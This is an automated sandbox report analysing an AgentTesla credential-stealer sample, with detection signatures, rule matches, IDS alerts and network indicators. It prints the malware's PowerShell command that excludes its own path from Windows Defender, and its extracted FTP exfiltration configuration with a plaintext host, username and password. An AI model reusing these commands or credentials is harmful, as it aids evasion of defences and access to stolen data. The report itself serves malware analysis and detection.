Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
dhPWt112uC.exe

Overview

General Information

Sample name:dhPWt112uC.exe
renamed because original name is a hash value
Original sample name:97b6842b7ae2e92619f7001e81705c62395fd8d4a2d5dbfa20b47976aaa3cdd1.exe
Analysis ID:1589023
MD5:2327e5c20b3cce0be582dbe461480cc2
SHA1:42d14ae8b60e22f36f487d8c3bee1ad43199170f
SHA256:97b6842b7ae2e92619f7001e81705c62395fd8d4a2d5dbfa20b47976aaa3cdd1
Tags:AgentTeslaexeuser-adrian__luca
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses FTP
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • dhPWt112uC.exe (PID: 7404 cmdline: "C:\Users\user\Desktop\dhPWt112uC.exe" MD5: 2327E5C20B3CCE0BE582DBE461480CC2)
    • powershell.exe (PID: 7612 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\dhPWt112uC.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7864 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • dhPWt112uC.exe (PID: 7628 cmdline: "C:\Users\user\Desktop\dhPWt112uC.exe" MD5: 2327E5C20B3CCE0BE582DBE461480CC2)
  • newapp.exe (PID: 8136 cmdline: "C:\Users\user\AppData\Roaming\newapp\newapp.exe" MD5: 2327E5C20B3CCE0BE582DBE461480CC2)
    • newapp.exe (PID: 2260 cmdline: "C:\Users\user\AppData\Roaming\newapp\newapp.exe" MD5: 2327E5C20B3CCE0BE582DBE461480CC2)
  • newapp.exe (PID: 7396 cmdline: "C:\Users\user\AppData\Roaming\newapp\newapp.exe" MD5: 2327E5C20B3CCE0BE582DBE461480CC2)
    • newapp.exe (PID: 7472 cmdline: "C:\Users\user\AppData\Roaming\newapp\newapp.exe" MD5: 2327E5C20B3CCE0BE582DBE461480CC2)
    • newapp.exe (PID: 1196 cmdline: "C:\Users\user\AppData\Roaming\newapp\newapp.exe" MD5: 2327E5C20B3CCE0BE582DBE461480CC2)
    • newapp.exe (PID: 7764 cmdline: "C:\Users\user\AppData\Roaming\newapp\newapp.exe" MD5: 2327E5C20B3CCE0BE582DBE461480CC2)
    • newapp.exe (PID: 5324 cmdline: "C:\Users\user\AppData\Roaming\newapp\newapp.exe" MD5: 2327E5C20B3CCE0BE582DBE461480CC2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "FTP", "Host": "ftp://ftp.ercolina-usa.com", "Username": "ben@ercolina-usa.com", "Password": "nXe0M~WkW&nJ"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    SourceRuleDescriptionAuthorStrings
    00000004.00000002.4168329440.000000000344C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000004.00000002.4168329440.0000000003421000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000004.00000002.4168329440.0000000003421000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          0000000B.00000002.2032655165.0000000004271000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            0000000B.00000002.2032655165.0000000004271000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              Click to see the 28 entries
              SourceRuleDescriptionAuthorStrings
              11.2.newapp.exe.4271d80.4.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                11.2.newapp.exe.4271d80.4.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  11.2.newapp.exe.4271d80.4.raw.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                  • 0x359dc:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                  • 0x35a4e:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                  • 0x35ad8:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                  • 0x35b6a:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                  • 0x35bd4:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                  • 0x35c46:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                  • 0x35cdc:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                  • 0x35d6c:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                  11.2.newapp.exe.4271d80.4.raw.unpackMALWARE_Win_AgentTeslaV2AgenetTesla Type 2 Keylogger payloadditekSHen
                  • 0x32bec:$s2: GetPrivateProfileString
                  • 0x32272:$s3: get_OSFullName
                  • 0x33969:$s5: remove_Key
                  • 0x33b29:$s5: remove_Key
                  • 0x34aa1:$s6: FtpWebRequest
                  • 0x359be:$s7: logins
                  • 0x35f30:$s7: logins
                  • 0x38c41:$s7: logins
                  • 0x38cf3:$s7: logins
                  • 0x3a7be:$s7: logins
                  • 0x3988d:$s9: 1.85 (Hash, version 2, native byte-order)
                  0.2.dhPWt112uC.exe.3821f18.2.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    Click to see the 41 entries

                    System Summary

                    barindex
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\dhPWt112uC.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\dhPWt112uC.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\dhPWt112uC.exe", ParentImage: C:\Users\user\Desktop\dhPWt112uC.exe, ParentProcessId: 7404, ParentProcessName: dhPWt112uC.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\dhPWt112uC.exe", ProcessId: 7612, ProcessName: powershell.exe
                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\newapp\newapp.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\dhPWt112uC.exe, ProcessId: 7628, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\newapp
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\dhPWt112uC.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\dhPWt112uC.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\dhPWt112uC.exe", ParentImage: C:\Users\user\Desktop\dhPWt112uC.exe, ParentProcessId: 7404, ParentProcessName: dhPWt112uC.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\dhPWt112uC.exe", ProcessId: 7612, ProcessName: powershell.exe
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\dhPWt112uC.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\dhPWt112uC.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\dhPWt112uC.exe", ParentImage: C:\Users\user\Desktop\dhPWt112uC.exe, ParentProcessId: 7404, ParentProcessName: dhPWt112uC.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\dhPWt112uC.exe", ProcessId: 7612, ProcessName: powershell.exe
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-11T08:34:18.247210+010020299271A Network Trojan was detected192.168.2.449747192.254.225.13621TCP
                    2025-01-11T08:34:25.740138+010020299271A Network Trojan was detected192.168.2.449752192.254.225.13621TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-11T08:34:18.709427+010028555421A Network Trojan was detected192.168.2.449748192.254.225.13649190TCP
                    2025-01-11T08:34:18.715270+010028555421A Network Trojan was detected192.168.2.449748192.254.225.13649190TCP
                    2025-01-11T08:34:26.210410+010028555421A Network Trojan was detected192.168.2.449753192.254.225.13645445TCP
                    2025-01-11T08:34:26.217704+010028555421A Network Trojan was detected192.168.2.449753192.254.225.13645445TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-11T08:35:33.826452+010018000071A Network Trojan was detected192.168.2.454658192.254.225.13631555TCP

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: dhPWt112uC.exeAvira: detected
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeAvira: detection malicious, Label: HEUR/AGEN.1309499
                    Source: 7.2.newapp.exe.3b65260.5.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.ercolina-usa.com", "Username": "ben@ercolina-usa.com", "Password": "nXe0M~WkW&nJ"}
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeReversingLabs: Detection: 75%
                    Source: dhPWt112uC.exeVirustotal: Detection: 75%Perma Link
                    Source: dhPWt112uC.exeReversingLabs: Detection: 75%
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeJoe Sandbox ML: detected
                    Source: dhPWt112uC.exeJoe Sandbox ML: detected
                    Source: dhPWt112uC.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49732 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49746 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49751 version: TLS 1.2
                    Source: dhPWt112uC.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: CFss.pdb source: dhPWt112uC.exe, newapp.exe.4.dr
                    Source: Binary string: CFss.pdbSHA256Z#5 source: dhPWt112uC.exe, newapp.exe.4.dr
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeCode function: 4x nop then jmp 06ABD644h0_2_06ABD82C
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 4x nop then jmp 0556D30Ch7_2_0556D4F4

                    Networking

                    barindex
                    Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.4:49748 -> 192.254.225.136:49190
                    Source: Network trafficSuricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.4:49747 -> 192.254.225.136:21
                    Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.4:49753 -> 192.254.225.136:45445
                    Source: Network trafficSuricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.4:49752 -> 192.254.225.136:21
                    Source: Network trafficSuricata IDS: 1800007 - Severity 1 - Joe Security MALWARE AgentTesla - FTP Exfil Keyboard Logs : 192.168.2.4:54658 -> 192.254.225.136:31555
                    Source: Yara matchFile source: 0.2.dhPWt112uC.exe.3821f18.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.dhPWt112uC.exe.37e4cf8.3.raw.unpack, type: UNPACKEDPE
                    Source: global trafficTCP traffic: 192.168.2.4:54389 -> 162.159.36.2:53
                    Source: Joe Sandbox ViewIP Address: 192.254.225.136 192.254.225.136
                    Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
                    Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
                    Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: unknownDNS query: name: api.ipify.org
                    Source: unknownDNS query: name: api.ipify.org
                    Source: unknownFTP traffic detected: 192.254.225.136:21 -> 192.168.2.4:49735 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 150 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 150 allowed.220-Local time is now 02:34. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 150 allowed.220-Local time is now 02:34. Server port: 21.220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 150 allowed.220-Local time is now 02:34. Server port: 21.220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                    Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                    Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                    Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                    Source: global trafficDNS traffic detected: DNS query: ftp.ercolina-usa.com
                    Source: dhPWt112uC.exe, 00000004.00000002.4168329440.000000000344C000.00000004.00000800.00020000.00000000.sdmp, dhPWt112uC.exe, 00000004.00000002.4168329440.00000000034AB000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000A.00000002.2008765342.000000000328C000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000F.00000002.4167926761.0000000002CEC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ercolina-usa.com
                    Source: dhPWt112uC.exe, 00000004.00000002.4168329440.000000000344C000.00000004.00000800.00020000.00000000.sdmp, dhPWt112uC.exe, 00000004.00000002.4168329440.00000000034AB000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000A.00000002.2008765342.000000000328C000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000F.00000002.4167926761.0000000002CEC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ftp.ercolina-usa.com
                    Source: dhPWt112uC.exe, 00000000.00000002.1778647173.0000000002793000.00000004.00000800.00020000.00000000.sdmp, dhPWt112uC.exe, 00000004.00000002.4168329440.00000000033D1000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 00000007.00000002.1948576547.0000000002B13000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000A.00000002.2008765342.0000000003211000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000B.00000002.2021441042.0000000003266000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000F.00000002.4167926761.0000000002C7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: dhPWt112uC.exe, 00000000.00000002.1787153844.0000000006B02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                    Source: dhPWt112uC.exe, 00000000.00000002.1787153844.0000000006B02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                    Source: dhPWt112uC.exe, 00000000.00000002.1787153844.0000000006B02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                    Source: dhPWt112uC.exe, 00000000.00000002.1787153844.0000000006B02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                    Source: dhPWt112uC.exe, 00000000.00000002.1787153844.0000000006B02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                    Source: dhPWt112uC.exe, 00000000.00000002.1787153844.0000000006B02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                    Source: dhPWt112uC.exe, 00000000.00000002.1787153844.0000000006B02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                    Source: dhPWt112uC.exe, 00000000.00000002.1787153844.0000000006B02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                    Source: dhPWt112uC.exe, 00000000.00000002.1787153844.0000000006B02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                    Source: dhPWt112uC.exe, 00000000.00000002.1787153844.0000000006B02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                    Source: dhPWt112uC.exe, 00000000.00000002.1787153844.0000000006B02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                    Source: dhPWt112uC.exe, 00000000.00000002.1787153844.0000000006B02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                    Source: dhPWt112uC.exe, 00000000.00000002.1787153844.0000000006B02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                    Source: dhPWt112uC.exe, 00000000.00000002.1787153844.0000000006B02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                    Source: dhPWt112uC.exe, 00000000.00000002.1787153844.0000000006B02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                    Source: dhPWt112uC.exe, 00000000.00000002.1787153844.0000000006B02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                    Source: dhPWt112uC.exe, 00000000.00000002.1787153844.0000000006B02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                    Source: dhPWt112uC.exe, 00000000.00000002.1787153844.0000000006B02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                    Source: dhPWt112uC.exe, 00000000.00000002.1787153844.0000000006B02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                    Source: dhPWt112uC.exe, 00000000.00000002.1787153844.0000000006B02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                    Source: dhPWt112uC.exe, 00000000.00000002.1787153844.0000000006B02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                    Source: dhPWt112uC.exe, 00000000.00000002.1787153844.0000000006B02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                    Source: dhPWt112uC.exe, 00000000.00000002.1787153844.0000000006B02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                    Source: dhPWt112uC.exe, 00000000.00000002.1787153844.0000000006B02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                    Source: dhPWt112uC.exe, 00000000.00000002.1787153844.0000000006B02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                    Source: dhPWt112uC.exe, 00000000.00000002.1779513713.00000000037E4000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 00000007.00000002.1954874837.0000000003B65000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000A.00000002.2000218775.0000000000402000.00000040.00000400.00020000.00000000.sdmp, newapp.exe, 0000000B.00000002.2032655165.0000000004271000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000B.00000002.2032655165.00000000042F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                    Source: dhPWt112uC.exe, 00000000.00000002.1779513713.00000000037E4000.00000004.00000800.00020000.00000000.sdmp, dhPWt112uC.exe, 00000004.00000002.4168329440.00000000033D1000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 00000007.00000002.1954874837.0000000003B65000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000A.00000002.2000218775.0000000000402000.00000040.00000400.00020000.00000000.sdmp, newapp.exe, 0000000A.00000002.2008765342.0000000003211000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000B.00000002.2032655165.0000000004271000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000B.00000002.2032655165.00000000042F2000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000F.00000002.4167926761.0000000002C7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                    Source: dhPWt112uC.exe, 00000004.00000002.4168329440.00000000033D1000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000A.00000002.2008765342.0000000003211000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000F.00000002.4167926761.0000000002C7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                    Source: dhPWt112uC.exe, 00000004.00000002.4168329440.00000000033D1000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000A.00000002.2008765342.0000000003211000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000F.00000002.4167926761.0000000002C7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                    Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49732 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49746 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49751 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\dhPWt112uC.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\newapp\newapp.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\newapp\newapp.exe
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeWindow created: window name: CLIPBRDWNDCLASS

                    System Summary

                    barindex
                    Source: 11.2.newapp.exe.4271d80.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 11.2.newapp.exe.4271d80.4.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 0.2.dhPWt112uC.exe.3821f18.2.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.dhPWt112uC.exe.3821f18.2.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 0.2.dhPWt112uC.exe.37e4cf8.3.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.dhPWt112uC.exe.37e4cf8.3.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
